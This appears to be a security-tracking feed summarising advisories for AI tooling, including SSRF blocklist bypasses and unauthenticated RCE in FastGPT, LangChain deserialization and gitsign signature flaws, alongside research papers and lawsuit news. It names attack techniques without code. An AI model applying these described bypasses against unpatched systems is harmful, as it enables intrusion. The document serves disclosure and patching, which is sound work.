All tracked items across vulnerabilities, news, research, incidents, and regulatory updates.
This academic paper, published in September 2026, presents a collaborative audit scheme designed to verify that IoT (internet of things, or connected devices like sensors and smart home devices) data remains accurate and unaltered as it moves through fog computing (processing that happens on devices or local servers rather than in distant data centers). The scheme appears to address security concerns around data integrity in distributed computing environments where multiple parties need to verify information together.
Spring AI's MilvusVectorStore#doDelete(List) method has a vulnerability called filter-expression injection (where attackers can manipulate database filter commands by inserting malicious code into document IDs) because document IDs are not properly cleaned before being used. This affects Spring AI versions 1.0.0 through 1.0.x and 1.1.0 through 1.1.x.
This article covers week two of a lawsuit where Elon Musk is suing OpenAI and its leaders, claiming they broke promises to keep the company as a nonprofit dedicated to safe AI development. OpenAI's president Greg Brockman countered that Musk actually pushed for the company to become for-profit and wanted majority control, and that Musk is suing because he left the company in 2018 and now sees it as a competitor to his own AI company, xAI (an artificial intelligence system). Musk is seeking $134 billion in damages and wants to remove the current leadership and undo OpenAI's recent restructuring.
FastGPT, a platform for building AI agents, has a vulnerability in versions before 4.14.17 that allows attackers to send requests to internal or private network addresses without needing to log in. The problem is in the fetchData function, which retrieves data from user-provided URLs but doesn't properly check them against a blocklist (isInternalAddress) that's meant to prevent SSRF attacks (where a server is tricked into making requests to systems it shouldn't access).
FastGPT, a platform for building AI agents, had a security flaw in how it protected against SSRF attacks (server-side request forgery, where an attacker tricks a server into connecting to unauthorized internal systems). While some endpoints blocked internal network URLs, the tool creation endpoints did not, allowing an authenticated user to save a malicious internal URL that could later be used without additional checks when running workflows.
FastGPT, an AI platform for building AI agents, has a vulnerability in versions 4.14.11 and earlier where its isInternalAddress() function fails to block access to cloud metadata endpoints (services that store sensitive system information). Attackers can bypass the blocklist using URL encoding techniques (methods to disguise URLs), and because a security check is disabled by default, the metadata endpoint remains accessible without additional protection.
FastGPT versions 4.14.11 and earlier have a DNS rebinding vulnerability (TOCTOU, or Time-of-Check to Time-of-Use, where a check happens at one moment but the actual action uses a different result moments later) in their isInternalAddress() function. The function validates that a hostname resolves to a safe private IP address, but because the actual HTTP request performs a separate DNS lookup afterward, an attacker can change the DNS record between validation and the request, bypassing the security check.
FastGPT, a platform for building AI agents, has a vulnerability in versions 4.14.13 and earlier where its code-sandbox component (a container that safely runs code in isolation) lacks proper resource limits. Attackers can exploit this by sending requests that consume excessive memory or CPU, bypassing the weak 500ms polling interval check and causing the service to crash for legitimate users (a Denial of Service attack). The vulnerability exists because the system relies only on software-level checks instead of operating system-level safeguards like cgroups (Linux tools that restrict resource usage).
New API, an LLM gateway and AI asset management system, has a vulnerability in versions 0.11.9-alpha.1 and earlier where its SSRF protection (safeguards against server-side request forgery, where an attacker tricks a server into making unintended web requests) fails to block the address 0.0.0.0. Any user with a valid API token can exploit this by sending requests with 0.0.0.0 as the image URL, causing the server to make requests to localhost (its own system) and potentially leak sensitive data when using certain AWS configurations.
FastGPT versions 4.14.10 through 4.14.12 have a critical vulnerability in their agent-sandbox component that allows unauthenticated Remote Code Execution (RCE, where attackers can run commands on a system they don't own). The startup script runs code-server (a web-based code editor) with authentication disabled and opens it to all network interfaces, meaning anyone who can reach the server's port 8080 can take complete control of the sandbox environment.
LangChain has a vulnerability where older code paths deserialize (convert serialized data back into objects) untrusted user input too broadly, allowing attackers to inject specially crafted LangChain objects that get instantiated with attacker-controlled arguments. The vulnerability only affects applications that accept untrusted structured input (like JSON), don't validate it first, and use affected APIs like `RunnableWithMessageHistory` or `astream_log()`.
gitsign verify has a signature verification flaw where it re-encodes commit objects through go-git before checking signatures, instead of verifying the raw git object bytes. When a malformed commit has duplicate tree headers, git-core and go-git parse them differently (git-core uses the first tree, go-git uses the second), allowing an attacker to craft a signature that passes gitsign verify but refers to a completely different commit than what git-core would show to users, breaking the trust model.
Open WebUI version 0.1.105 has an authorization flaw where users with a 'pending' status (the default for new sign-ups) can still receive authentication tokens (JWT, a standardized way to prove identity in web requests) and make API calls meant only for approved users, bypassing the authorization check (the system that verifies what actions a user is allowed to perform) that is only enforced on the website interface, not in the backend API itself.
This article discusses using HTML instead of Markdown when requesting output from Claude, an AI assistant. HTML allows Claude to create richer explanations by including SVG diagrams, interactive widgets, and better navigation, which was less practical with older language models that had strict token limits (tokens being units of text that count toward a model's processing capacity).
The OpenTelemetry.Exporter.Instana NuGet package (a tool for monitoring application performance) disables TLS certificate validation (the security check that verifies a server's identity) when a proxy is configured using the INSTANA_ENDPOINT_PROXY environment variable. This means an attacker who intercepts the network connection could read sensitive telemetry data and steal the Instana API key (a credential that grants access to monitoring systems). The vulnerability only affects systems where a proxy is configured and that proxy is either controlled by an attacker or vulnerable to interception.
The kanban npm package (used by the cline CLI tool) runs a WebSocket server on localhost that accepts connections from any website without checking the Origin header (a validation that confirms the connection came from an authorized source). This allows attackers to leak sensitive data like file paths and AI chat messages, inject commands into running terminals to achieve remote code execution (executing arbitrary code on a developer's machine), and kill running tasks.
This academic paper from September 2026 examines how valuable leaked data from online social networks can be to attackers and malicious actors. The research, published in Computers & Security, analyzes the characteristics and potential uses of personal information that gets exposed when social media platforms experience breaches or data leaks.
This academic paper describes a system that combines fog computing (processing data closer to where it's generated rather than in distant cloud servers) with data integrity auditing (checking that stored files haven't been corrupted or tampered with) and deduplication (removing duplicate copies of the same data to save storage space) for cloud storage. The research proposes a scheme that performs these three functions together to improve security and efficiency when storing data in the cloud.
This is an academic survey article that catalogs 120 domain-specific languages (DSLs, which are specialized programming languages designed for particular problem areas) related to security. The article appears to be a comprehensive review published in a major computer science journal, covering the landscape of security-focused languages rather than describing a specific vulnerability or problem.
This research paper presents a method for detecting living-off-the-land reverse shells (attacks where hackers use built-in system tools already present on a computer to create a backdoor connection back to their own machine) at a large scale by using data synthesis (artificially creating training examples rather than collecting real attack data). The approach aims to improve security detection systems' ability to identify these sneaky attacks that are hard to catch because they blend in with normal system activity.
Fix: Upgrade to Spring AI 1.0.7 or greater (for 1.0.x users) or Spring AI 1.1.6 or greater (for 1.1.x users).
NVD/CVE DatabaseFix: Update FastGPT to version 4.14.17 or later, where this issue has been patched.
NVD/CVE DatabaseFix: This issue has been patched in version 4.14.17.
NVD/CVE DatabaseFix: Update to FastGPT version 4.14.13 or later, as this issue has been patched in that version.
NVD/CVE DatabaseFix: LangChain will deprecate the affected APIs (`RunnableWithMessageHistory`, `astream_log()`, and `astream_events(version="v1")`) and recommend migrating to newer streaming and memory patterns like the `stream` API. Additionally, LangChain will update `load()` and `loads()` functions to tighten deserialization behavior so broad object revival is not applied implicitly to untrusted input.
GitHub Advisory DatabaseFix: Pull request #4153 refactors the HttpClient creation so that TLS certificate validation is no longer disabled by default when using a proxy. For environments where disabling certificate validation is necessary (such as local development), the previous behavior can be restored by configuring a custom HttpClientFactory with ServerCertificateCustomValidationCallback set to accept any certificate, as shown in the code example provided in the remediation section.
GitHub Advisory Database